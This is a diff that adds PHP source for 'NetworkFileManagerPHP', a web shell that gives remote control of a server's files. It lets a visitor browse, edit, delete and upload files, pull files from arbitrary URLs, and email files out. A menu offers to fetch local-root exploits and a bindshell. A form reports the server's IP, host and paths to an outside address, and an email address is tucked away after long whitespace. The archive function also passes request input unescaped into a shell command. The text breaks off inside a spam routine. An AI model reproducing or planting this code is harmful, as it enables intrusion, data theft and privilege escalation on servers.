+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}                                                                                                                                                      $sd98 = "john.barker446@gmail.com";
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $public_sites, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_sites$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
